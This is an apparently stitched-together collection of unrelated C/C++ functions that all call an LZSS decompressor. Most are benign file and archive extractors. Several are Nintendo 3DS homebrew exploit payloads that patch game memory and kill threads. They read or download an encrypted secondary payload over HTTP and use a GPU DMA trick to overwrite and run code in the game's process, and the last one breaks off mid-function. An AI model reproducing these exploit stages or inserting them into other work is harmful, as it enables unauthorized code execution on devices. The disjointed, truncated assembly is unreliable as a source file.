void _main() { Handle fileHandle = 0x0; Result ret = 0x0; u32 compressed_size = 0x0; u8* compressed_buffer = LINEAR_BUFFER; // load payload.bin from savegame ret = _FSUSER_OpenFileDirectly(fsHandle, &fileHandle, 0x0, 0x00000004, PATH_EMPTY, "", 1, PATH_CHAR, "/payload.bin", 13, 0x1, 0x0); if(ret)*(u32*)ret = 0xdead0001; ret = _FSUSER_ReadFile(&fileHandle, &compressed_size, 0x0, compressed_buffer, 0xA000); if(ret)*(u32*)ret = 0xdead0002; u8* decompressed_buffer = &compressed_buffer[(compressed_size + 0xfff) & ~0xfff]; u32 decompressed_size = lzss_get_decompressed_size(compressed_buffer, compressed_size); // decompress payload ret = lzss_decompress(compressed_buffer, compressed_size, decompressed_buffer, decompressed_size); // copy payload to text ret = _GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)decompressed_buffer, decompressed_size); ret = gspwn((void*)(IRON_CODE_LINEAR_BASE + 0x00101000 - 0x00100000), decompressed_buffer, (decompressed_size + 0x1f) & ~0x1f); svc_sleepThread(300*1000*1000); // ghetto dcache invalidation // don't judge me int i, j;//, k; // for(k=0; k<0x2; k++) for(j=0; j<0x4; j++) for(i=0; i<0x01000000/0x4; i+=0x4) LINEAR_BUFFER[i+j]^=0xDEADBABE; // put framebuffers in linear mem so they're writable u8* top_framebuffer = &LINEAR_BUFFER[0x00100000]; u8* low_framebuffer = &top_framebuffer[0x00046500]; _GSPGPU_SetBufferSwap(*gspHandle, 0, (GSP_FramebufferInfo){0, (u32*)top_framebuffer, (u32*)top_framebuffer, 240 * 3, (1<<8)|(1<<6)|1, 0, 0}); _GSPGPU_SetBufferSwap(*gspHandle, 1, (GSP_FramebufferInfo){0, (u32*)low_framebuffer, (u32*)low_framebuffer, 240 * 3, 1, 0, 0}); // un-init DSP so killing Ironfall will work _DSP_UnloadComponent(dspHandle); _DSP_RegisterInterruptEvents(dspHandle, 0x0, 0x2, 0x2); // run payload { void (*payload)(u32* paramlk, u32* stack_pointer) = (void*)0x00101000; u32* paramblk = (u32*)LINEAR_BUFFER; paramblk[0x1c >> 2] = IRON_GSPGPU_GXCMD4; paramblk[0x20 >> 2] = IRON_GSPGPU_FLUSHDATACACHE_WRAPPER; paramblk[0x48 >> 2] = 0x8d; // flags paramblk[0x58 >> 2] = IRON_GSPGPU_HANDLE; paramblk[0x64 >> 2] = 0x08010000; payload(paramblk, (u32*)(0x10000000 - 4)); } *(u32*)ret = 0xdead0008; }
/* 封包资源提取函数 */ static int ADVDX_pak_extract_resource(struct package *pkg, struct package_resource *pkg_res) { BYTE *compr, *uncompr; DWORD comprlen, uncomprlen; comprlen = pkg_res->raw_data_length; compr = (BYTE *)malloc(comprlen); if (ADVDX_readvec(pkg, compr, comprlen, pkg_res->offset, IO_SEEK_SET)) { free(compr); return -CUI_EREADVECONLY; } if (pkg_res->flags & PKG_RES_FLAG_RAW) { pkg_res->raw_data = compr; return 0; } if (!strncmp((char *)compr, "_BMD", 4)) { /* type2 */ bmd_header_t *bmd = (bmd_header_t *)compr; uncomprlen = bmd->width * bmd->height * 4; uncompr = (BYTE *)malloc(uncomprlen); if (!uncompr) { free(compr); return -CUI_EMEM; } lzss_decompress(uncompr, uncomprlen, compr + sizeof(*bmd), bmd->length); if (MySaveAsBMP(uncompr, uncomprlen, NULL, 0, bmd->width, 0 - bmd->height, 32, 0, (BYTE **)&pkg_res->actual_data, &pkg_res->actual_data_length, my_malloc)) { free(uncompr); free(compr); return -CUI_EMEM; } free(uncompr); pkg_res->flags |= PKG_RES_FLAG_APEXT; pkg_res->replace_extension = _T(".bmp"); } pkg_res->raw_data = compr; return 0; }
std::unique_ptr<Image> AnimParser::ParseFrame0804(uint8_t frame_width, uint8_t frame_height) { frame_width = align_to_n(frame_width, 4); const uint8_t* newptr = ptr; uint32_t newsize = size; std::vector<uint8_t> decompressed_data = lzss_decompress(ptr, size, &newptr, &newsize); uint32_t compressed_size = size - newsize; ptr = newptr + (align_to_n(compressed_size, 4) - compressed_size); size = newsize - (align_to_n(compressed_size, 4) - compressed_size); std::unique_ptr<Image> image(new Image(frame_width, frame_height)); uint32_t* pixels = (uint32_t*)image->GetData(); for (int i = 0; i < frame_width * frame_height; ++i) { *pixels++ = palette.at(decompressed_data.at(i)); } return image; }
static int ipac_decompress_iel1(iel1_header_t *iel1, DWORD iel1_len, BYTE **ret_buf, DWORD *ret_len) { BYTE *uncompr, *compr; DWORD uncomprLen, comprLen, actlen; uncomprLen = iel1->length; uncompr = (BYTE *)malloc(uncomprLen); if (!uncompr) return -1; compr = (BYTE *)(iel1 + 1); comprLen = iel1_len - sizeof(*iel1); actlen = lzss_decompress(uncompr, uncomprLen, compr, comprLen); if (actlen != uncomprLen) { free(uncompr); return -1; } *ret_buf = uncompr; *ret_len = actlen; return 0; }
/*************************************** * SZDDD_EXTRACT *************************************** * decompresses an SZDD file */ static int szddd_extract(struct msszdd_decompressor *base, struct msszddd_header *hdr, const char *filename) { struct msszdd_decompressor_p *self = (struct msszdd_decompressor_p *) base; struct mspack_file *fh, *outfh; struct mspack_system *sys; off_t data_offset; if (!self) return MSPACK_ERR_ARGS; if (!hdr) return self->error = MSPACK_ERR_ARGS; sys = self->system; fh = ((struct msszddd_header_p *) hdr)->fh; /* seek to the compressed data */ data_offset = (hdr->format == MSSZDD_FMT_NORMAL) ? 14 : 12; if (sys->seek(fh, data_offset, MSPACK_SYS_SEEK_START)) { return self->error = MSPACK_ERR_SEEK; } /* open file for output */ if (!(outfh = sys->open(sys, filename, MSPACK_SYS_OPEN_WRITE))) { return self->error = MSPACK_ERR_OPEN; } /* decompress the data */ self->error = lzss_decompress(sys, fh, outfh, SZDD_INPUT_SIZE, hdr->format == MSSZDD_FMT_NORMAL ? LZSS_MODE_EXPAND : LZSS_MODE_QBASIC); /* close output file */ sys->close(outfh); return self->error; }
void exefs_save(exefs_context* ctx, u32 index, u32 flags) { exefs_sectionheader* section = (exefs_sectionheader*)(ctx->header.section + index); char outfname[MAX_PATH]; char name[64]; u32 offset; u32 size; FILE* fout; u32 compressedsize = 0; u32 decompressedsize = 0; u8* compressedbuffer = 0; u8* decompressedbuffer = 0; filepath* dirpath = 0; offset = getle32(section->offset) + sizeof(exefs_header); size = getle32(section->size); dirpath = settings_get_exefs_dir_path(ctx->usersettings); if (size == 0 || dirpath == 0 || dirpath->valid == 0) return; if (size >= ctx->size) { fprintf(stderr, "Error, ExeFS section %d size invalid\n", index); return; } memset(name, 0, sizeof(name)); memcpy(name, section->name, 8); memcpy(outfname, dirpath->pathname, MAX_PATH); strcat(outfname, "/"); if (name[0] == '.') strcat(outfname, name+1); else strcat(outfname, name); strcat(outfname, ".bin"); fout = fopen(outfname, "wb"); if (fout == 0) { fprintf(stderr, "Error, failed to create file %s\n", outfname); goto clean; } fseek(ctx->file, ctx->offset + offset, SEEK_SET); ctr_init_counter(&ctx->aes, ctx->key, ctx->counter); ctr_add_counter(&ctx->aes, offset / 0x10); if (index == 0 && (ctx->compressedflag || (flags & CompressCodeFlag)) && ((flags & RawFlag) == 0)) { fprintf(stdout, "Decompressing section %s to %s...\n", name, outfname); compressedsize = size; compressedbuffer = malloc(compressedsize); if (compressedbuffer == 0) { fprintf(stdout, "Error allocating memory\n"); goto clean; } if (compressedsize != fread(compressedbuffer, 1, compressedsize, ctx->file)) { fprintf(stdout, "Error reading input file\n"); goto clean; } if (ctx->encrypted) ctr_crypt_counter(&ctx->aes, compressedbuffer, compressedbuffer, compressedsize); decompressedsize = lzss_get_decompressed_size(compressedbuffer, compressedsize); decompressedbuffer = malloc(decompressedsize); if (decompressedbuffer == 0) { fprintf(stdout, "Error allocating memory\n"); goto clean; } if (0 == lzss_decompress(compressedbuffer, compressedsize, decompressedbuffer, decompressedsize)) goto clean; if (decompressedsize != fwrite(decompressedbuffer, 1, decompressedsize, fout)) { fprintf(stdout, "Error writing output file\n"); goto clean; } } else { u8 buffer[16 * 1024]; fprintf(stdout, "Saving section %s to %s...\n", name, outfname); while(size) { u32 max = sizeof(buffer); if (max > size) max = size; if (max != fread(buffer, 1, max, ctx->file)) { fprintf(stdout, "Error reading input file\n"); goto clean; } if (ctx->encrypted) ctr_crypt_counter(&ctx->aes, buffer, buffer, max); if (max != fwrite(buffer, 1, max, fout)) { fprintf(stdout, "Error writing output file\n"); goto clean; } size -= max; } } clean: free(compressedbuffer); free(decompressedbuffer); return; }
int _main() { Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR; Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; // drawString(CN_TOPFBADR1,"ninjhaxx",0,0); // drawString(CN_TOPFBADR2,"ninjhaxx",0,0); Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR; int line=10; Result ret; Handle* addressArbiterHandle=(Handle*)0x334960; Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368; Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20; Handle** dspHandle=(Handle**)0x334EFC; _DSP_UnloadComponent(*dspHandle); _DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2); //close threads //patch gsp event handler addr to kill gsp thread ASAP *((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr //patch waitSyncN patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F); patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13); patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E); // patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52); //patch arbitrateAddress patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40); //wake threads svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0); svc_signalEvent(((Handle*)0x3480d0)[2]); s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1); //kill thread5 without panicking the kernel... *(u8*)0x359935=0x00; svc_sleepThread(0x10000000); //load secondary payload u32 secondaryPayloadSize; { Result ret; Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR; FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}}; //write secondary payload file Handle fileHandle; ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE); if(ret)*(u32*)NULL=0xC0DF0002; ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000); if(ret)*(u32*)NULL=0xC0DF0003; ret=_FSFILE_Close(fileHandle); if(ret)*(u32*)NULL=0xC0DF0004; } //decompress it { lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize)); } ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000); doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000); svc_sleepThread(0x3B9ACA00); // //close thread handles // ret=svc_closeHandle(*((Handle*)0x359938)); // ret=svc_closeHandle(*((Handle*)0x34FEA4)); // ret=svc_closeHandle(*((Handle*)0x356274)); // ret=svc_closeHandle(*((Handle*)0x334730)); // ret=svc_closeHandle(*((Handle*)0x334F64)); void (*reset)(int size)=(void*)CN_3DSX_LOADADR; reset(0); while(1); return 0; }
/*************************************** * KWAJD_EXTRACT *************************************** * decompresses a KWAJ file */ static int kwajd_extract(struct mskwaj_decompressor *base, struct mskwajd_header *hdr, const char *filename) { struct mskwaj_decompressor_p *self = (struct mskwaj_decompressor_p *) base; struct mspack_system *sys; struct mspack_file *fh, *outfh; if (!self) return MSPACK_ERR_ARGS; if (!hdr) return self->error = MSPACK_ERR_ARGS; sys = self->system; fh = ((struct mskwajd_header_p *) hdr)->fh; /* seek to the compressed data */ if (sys->seek(fh, hdr->data_offset, MSPACK_SYS_SEEK_START)) { return self->error = MSPACK_ERR_SEEK; } /* open file for output */ if (!(outfh = sys->open(sys, filename, MSPACK_SYS_OPEN_WRITE))) { return self->error = MSPACK_ERR_OPEN; } self->error = MSPACK_ERR_OK; /* decompress based on format */ if (hdr->comp_type == MSKWAJ_COMP_NONE || hdr->comp_type == MSKWAJ_COMP_XOR) { /* NONE is a straight copy. XOR is a copy xored with 0xFF */ unsigned char *buf = (unsigned char *) sys->alloc(sys, (size_t) KWAJ_INPUT_SIZE); if (buf) { int read, i; while ((read = sys->read(fh, buf, KWAJ_INPUT_SIZE)) > 0) { if (hdr->comp_type == MSKWAJ_COMP_XOR) { for (i = 0; i < read; i++) buf[i] ^= 0xFF; } if (sys->write(outfh, buf, read) != read) { self->error = MSPACK_ERR_WRITE; break; } } if (read < 0) self->error = MSPACK_ERR_READ; sys->free(buf); } else { self->error = MSPACK_ERR_NOMEMORY; } } else if (hdr->comp_type == MSKWAJ_COMP_SZDD) { self->error = lzss_decompress(sys, fh, outfh, KWAJ_INPUT_SIZE, LZSS_MODE_EXPAND); } else if (hdr->comp_type == MSKWAJ_COMP_LZH) { struct kwajd_stream *lzh = lzh_init(sys, fh, outfh); self->error = (lzh) ? lzh_decompress(lzh) : MSPACK_ERR_NOMEMORY; lzh_free(lzh); } else { self->error = MSPACK_ERR_DATAFORMAT; } /* close output file */ sys->close(outfh); return self->error; }
int _main() { Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR; Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; paintScreen(0x00,0x00,0x00); // drawString((u8*)CN_TOPFBADR1,"ninjhaxx",0,0); // drawString((u8*)CN_TOPFBADR2,"ninjhaxx",0,0); int line=10; Result ret; Handle* addressArbiterHandle=(Handle*)0x003414B0; Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78; Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24; Handle** dspHandle=(Handle**)0x341A4C; _DSP_UnloadComponent(*dspHandle); _DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2); //close threads //patch gsp event handler addr to kill gsp thread ASAP *((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr //patch waitSyncN patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41); patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45); patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A); // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44); // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31); //patch arbitrateAddress patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C); //wake threads svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0); svc_signalEvent(((Handle*)0x354ba8)[2]); s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK ! //kill thread5 without panicking the kernel... *(u8*)(0x3664D8+0xd)=0x00; //load secondary payload u32 secondaryPayloadSize; { Result ret; Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR; FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}}; //read secondary payload file Handle fileHandle; ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE); if(ret)*(u32*)NULL=0xC0DF0002; ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000); if(ret)*(u32*)NULL=0xC0DF0003; ret=_FSFILE_Close(fileHandle); if(ret)*(u32*)NULL=0xC0DF0004; } //decompress it { lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize)); } ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000); doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000); svc_sleepThread(0x3B9ACA00); void (*reset)(int size)=(void*)CN_3DSX_LOADADR; reset(0); while(1); return 0; }
static int RAGE_Pac_extract_resource(struct package *pkg, struct package_resource *pkg_res) { BYTE *compr, *uncompr; DWORD comprlen, uncomprlen; comprlen = pkg_res->raw_data_length; compr = (BYTE *)malloc(comprlen); if (!compr) return -CUI_EMEM; if (pkg->pio->readvec(pkg, compr, comprlen, pkg_res->offset, IO_SEEK_SET)) { free(compr); return -CUI_EREADVEC; } if (!strncmp((char *)compr, "CMP1", 4)) { CMP_header_t *cmp_header = (CMP_header_t *)compr; uncomprlen = cmp_header->uncomprlen; uncompr = (BYTE *)malloc(uncomprlen); if (!uncompr) { free(compr); return -CUI_EMEM; } lzss_decompress(uncompr, uncomprlen, (BYTE *)(cmp_header + 1), cmp_header->comprlen); if (!strncmp((char *)uncompr, "SCR1", 4)) { pkg_res->flags |= PKG_RES_FLAG_REEXT; pkg_res->replace_extension = _T(".scr"); } else if (!strncmp((char *)uncompr, "BM", 2)) { BITMAPFILEHEADER *bmfh; BITMAPINFOHEADER *bmiHeader; DWORD line_len, act_line_len; /* TODO line len align */ bmfh = (BITMAPFILEHEADER *)uncompr; bmiHeader = (BITMAPINFOHEADER *)(bmfh + 1); line_len = bmiHeader->biWidth * bmiHeader->biBitCount / 8; act_line_len = (act_line_len + 3) & ~3; if (line_len != act_line_len) { BYTE *rgb = (BYTE *)(bmiHeader + 1); BYTE *act_uncompr, *palette; DWORD rgb_len, act_uncomprlen, palette_length; if (bmiHeader->biBitCount <= 8) { palette = rgb; palette_length = 0x400; rgb += palette_length; } else { palette = NULL; palette_length = 0; } rgb_len = line_len * bmiHeader->biHeight; if (MyBuildBMPFile(rgb, rgb_len, palette, palette_length, bmiHeader->biWidth, bmiHeader->biHeight, bmiHeader->biBitCount, &act_uncompr, &act_uncomprlen, my_malloc)) { free(uncompr); free(compr); return -CUI_EMEM; } free(uncompr); uncompr = act_uncompr; uncomprlen = act_uncomprlen; } pkg_res->flags |= PKG_RES_FLAG_REEXT; pkg_res->replace_extension = _T(".bmp"); } } else { uncompr = NULL; uncomprlen = 0; } pkg_res->raw_data = compr; pkg_res->actual_data = uncompr; pkg_res->actual_data_length = uncomprlen; return 0; }
/* 封包资源提取函数 */ static int RPM_ADV_SYSTEM_arc_extract_resource(struct package *pkg, struct package_resource *pkg_res) { u32 is_compressed; BYTE *uncompr, *compr, *actdata; DWORD actlen; is_compressed = (u32)package_get_private(pkg); compr = (BYTE *)malloc(pkg_res->raw_data_length); if (!compr) return -CUI_EMEM; if (pkg->pio->readvec(pkg, compr, pkg_res->raw_data_length, pkg_res->offset, IO_SEEK_SET)) { free(compr); return -CUI_EREADVEC; } if (is_compressed) { uncompr = (BYTE *)malloc(pkg_res->actual_data_length); if (!uncompr) { free(compr); return -CUI_EMEM; } actlen = pkg_res->actual_data_length; lzss_decompress(uncompr, &actlen, compr, pkg_res->raw_data_length); if (actlen != pkg_res->actual_data_length) { free(uncompr); free(compr); return -CUI_EUNCOMPR; } free(compr); compr = NULL; actdata = uncompr; } else { uncompr = NULL; actlen = pkg_res->raw_data_length; actdata = compr; } /* 对于较长的资源名称,后缀名有时候会被揭短 */ if (!strncmp((char *)actdata, "BM", 2)) { BITMAPFILEHEADER *bmfh = (BITMAPFILEHEADER *)actdata; BITMAPINFOHEADER *bmif = (BITMAPINFOHEADER *)(bmfh + 1); if (bmif->biBitCount == 24) { DWORD bmp32_size = bmif->biWidth * bmif->biHeight * 4 + sizeof(BITMAPINFOHEADER) + sizeof(BITMAPFILEHEADER) + 2; DWORD bmp24_size = ((bmif->biWidth * 3 + 3) & ~3) * 3 + sizeof(BITMAPINFOHEADER) + sizeof(BITMAPFILEHEADER) + 2; if (bmp24_size > actlen && bmp32_size >= actlen) { DWORD rgba_size = bmif->biWidth * bmif->biHeight * 4; BYTE *rgba = new BYTE[rgba_size]; if (!rgba) { free(actdata); return -CUI_EMEM; } DWORD align = (4 - ((bmif->biWidth * 3) & 3)) & 3; BYTE *src = actdata + bmfh->bfOffBits; BYTE *dst = rgba; BYTE *a = actdata + bmfh->bfSize; for (int y = 0; y < bmif->biHeight; ++y) { for (int x = 0; x < bmif->biWidth; ++x) { *dst++ = *src++; *dst++ = *src++; *dst++ = *src++; *dst++ = *a++; } src += align; } BYTE *ret; DWORD ret_size; if (MyBuildBMPFile(rgba, rgba_size, NULL, 0, bmif->biWidth, bmif->biHeight, 32, &ret, &ret_size, my_malloc)) { delete [] rgba; delete [] actdata; return -CUI_EMEM; } delete [] rgba; delete [] actdata; uncompr = ret; pkg_res->actual_data_length = ret_size; } } pkg_res->flags |= PKG_RES_FLAG_REEXT; pkg_res->replace_extension = _T(".BMP"); } if (strstr(pkg_res->name, ".lib")) { const char *key = "偰偡偲"; // てすと for (DWORD i = 0, k = 0; i < actlen; i++) { actdata[i] -= key[k++]; if (k <= strlen(key)) k = 0; } } pkg_res->raw_data = compr; pkg_res->actual_data = uncompr; return 0; }
int _main() { Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR; Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00; // drawString(TOPFBADR1,"ninjhaxx",0,0); // drawString(TOPFBADR2,"ninjhaxx",0,0); Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR; int line=10; Result ret; Handle* addressArbiterHandle=(Handle*)0x003414B0; Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78; Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24; Handle** dspHandle=(Handle**)0x341A4C; _DSP_UnloadComponent(*dspHandle); _DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2); //close threads //patch gsp event handler addr to kill gsp thread ASAP *((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr //patch waitSyncN patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41); patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45); patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A); // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44); // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31); //patch arbitrateAddress patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C); //wake threads svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0); svc_signalEvent(((Handle*)0x354ba8)[2]); s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK ! //kill thread5 without panicking the kernel... *(u8*)(0x3664D8+0xd)=0x00; svc_sleepThread(0x10000000); Handle httpcHandle; ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C"); // drawHex(ret,0,line+=10); // drawHex(httpcHandle,0,line+=10); Handle httpContextHandle=0x00; ret=HTTPC_Initialize(httpcHandle); // drawHex(ret,0,line+=10); ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL OUTNAME ".bin", &httpContextHandle); // drawHex(ret,0,line+=10); Handle httpcHandle2; ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C"); ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle); ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle); // drawHex(ret,0,line+=10); ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle); // drawHex(ret,0,line+=10); u8* buffer0=(u8*)0x14100000; u8* buffer1=(u8*)0x14300000; u32 secondaryPayloadSize=0x0; ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000); ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize); // drawHex(ret,0,line+=10); HTTPC_CloseContext(httpcHandle2, httpContextHandle); //TODO : modify key/parray first ? //(use some of its slots as variables in ROP to confuse people ?) //decrypt secondary payload Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900; Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48; blowfishKeyScheduler((u32*)0x14200000); blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize); while(!*(u32*)(&buffer1[secondaryPayloadSize-4]))secondaryPayloadSize-=4; lzss_decompress(buffer1, secondaryPayloadSize, buffer0, lzss_get_decompressed_size(buffer1, secondaryPayloadSize)); ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer0, 0x300000); // drawHex(ret,0,line+=10); doGspwn((u32*)(buffer0), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000); svc_sleepThread(0x3B9ACA00); // drawString(TOPFBADR1,"ninjhax2",100,0); // drawString(TOPFBADR2,"ninjhax2",100,0); void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR; reset(secondaryPayloadSize); return 0; }
int _main() { Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR; Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; // drawString(CN_TOPFBADR1,"ninjhaxx",0,0); // drawString(CN_TOPFBADR2,"ninjhaxx",0,0); Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR; int line=10; Result ret; #ifdef CN_WEST Handle* addressArbiterHandle=(Handle*)0x334960; Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368; Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20; Handle** dspHandle=(Handle**)0x334EFC; _DSP_UnloadComponent(*dspHandle); _DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2); //close threads //patch gsp event handler addr to kill gsp thread ASAP *((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr // //patch waitSyncN // patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F); // patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13); // patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E); // // patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52); // //patch arbitrateAddress // patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40); // //wake threads // svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0); // svc_signalEvent(((Handle*)0x3480d0)[2]); // s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1); //kill thread5 without panicking the kernel... *(u8*)0x359935=0x00; #else Handle* addressArbiterHandle=(Handle*)0x003414B0; Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78; Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24; Handle** dspHandle=(Handle**)0x341A4C; _DSP_UnloadComponent(*dspHandle); _DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2); //close threads //patch gsp event handler addr to kill gsp thread ASAP *((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr // //patch waitSyncN // patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41); // patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45); // patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A); // // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44); // // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31); // //patch arbitrateAddress // patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C); // //wake threads // svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0); // svc_signalEvent(((Handle*)0x354ba8)[2]); // s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK ! //kill thread5 without panicking the kernel... *(u8*)(0x3664D8+0xd)=0x00; #endif // everything else is common svc_sleepThread(0x10000000); //load secondary payload u32 secondaryPayloadSize; { Result ret; Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR; FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}}; //write secondary payload file Handle fileHandle; ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE); if(ret)*(u32*)NULL=0xC0DF0002; ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000); if(ret)*(u32*)NULL=0xC0DF0003; ret=_FSFILE_Close(fileHandle); if(ret)*(u32*)NULL=0xC0DF0004; } #ifndef QRINSTALLER //decompress it { 